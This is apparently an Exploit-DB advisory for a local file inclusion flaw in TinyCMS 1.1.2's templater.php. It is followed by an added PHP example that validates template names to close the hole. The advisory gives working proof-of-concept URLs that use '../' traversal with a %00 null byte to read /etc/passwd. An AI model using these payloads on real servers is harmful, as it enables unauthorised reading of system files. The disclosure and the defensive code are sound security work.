TinyCMS 1.1.2 - 'templater.php' Local File Inclusion

Author: cOndemned
type: webapps
platform: php
date_added: 2008-08-20  
date_updated: 2016-12-20  
verified: 1  
codes: OSVDB-47626;CVE-2008-4740  

raw file: 6287.txt  
########################################################################################
#
#   Name        :   tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability
#   Author      :   cOndemned [ Dark-Coders ]
#   Greetz      :   Avantura, str0ke, ZaBeaTy, doctor, voo|doo, sid.psycho, irk4z
#   Conditions  :   Magic quotes gpc = Off / Register Globals = On
#   Other info  :   Prior versions probably are vulnerable too
#
########################################################################################

Source of /modules/ZZ_Templater/templater.php (lines 17-19)

    [ ... ]

    $ftemplatedir = 'templates/'.$config['template'].'/';
    include('templates/'.$config['template'].'/data.php');      // <--- LFI
    if($tdata['useblocks'] == 1)

    [ ... ]


Proof of Concept :

    http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../etc/passwd%00
    http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../[local_file]%00


Just 4 fun

# milw0rm.com [2008-08-21]
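
Added example (not part of the original advisory and not TinyCMS code): a hardened way to resolve the data.php path that the include shown above builds by string concatenation. With Register Globals = On, a direct request to templater.php turns config[template] into $config['template'], and with Magic quotes gpc = Off the %00 is not escaped, so it cuts off the trailing '/data.php'. Assumptions: PHP 7.1 or later; the function name resolve_template_data() and the temporary directory layout are hypothetical.

```php
<?php
// Added example, not TinyCMS code. resolve_template_data() and the sample
// directory layout are hypothetical and constructed for illustration.

// Return the absolute path of <baseDir>/<name>/data.php, or null when the
// name is not a plain directory name that resolves inside baseDir.
function resolve_template_data(string $baseDir, $name): ?string
{
    // config[template][]=x arrives as an array, not a string: reject it.
    if (!is_string($name)) {
        return null;
    }
    // Allowlist of letters, digits, '_' and '-': no '/', no '.', no NUL byte.
    // \A and \z anchor the whole value; the 64-character cap is arbitrary.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $file = realpath($baseDir . '/' . $name . '/data.php');
    if ($base === false || $file === false) {
        return null; // template directory or its data.php does not exist
    }
    // Containment check after symlinks are resolved.
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Constructed sample layout: <tmp>/tinycms_demo_<pid>/templates/default/data.php
$root = sys_get_temp_dir() . '/tinycms_demo_' . getmypid();
mkdir($root . '/templates/default', 0700, true);
file_put_contents($root . '/templates/default/data.php', "<?php \$tdata = array('useblocks' => 1);\n");

$samples = array(
    'default',                    // legitimate template name
    "../../../../etc/passwd\0",   // proof-of-concept value after URL decoding
    '../default',                 // traversal without a NUL byte
    array('default'),             // array-typed parameter
);
foreach ($samples as $s) {
    $path = resolve_template_data($root . '/templates', $s);
    echo json_encode($s, JSON_UNESCAPED_SLASHES), ' => ',
        $path === null ? 'rejected' : 'include ' . $path, "\n";
}
unlink($root . '/templates/default/data.php');
rmdir($root . '/templates/default');
rmdir($root . '/templates');
rmdir($root);
```

Only the first sample resolves to a path; the other three are rejected before any filesystem access. In templater.php the returned path would replace the concatenated string passed to include, and initialising $config before request data can reach it (or running with register_globals disabled) closes the variable-injection half of the bug.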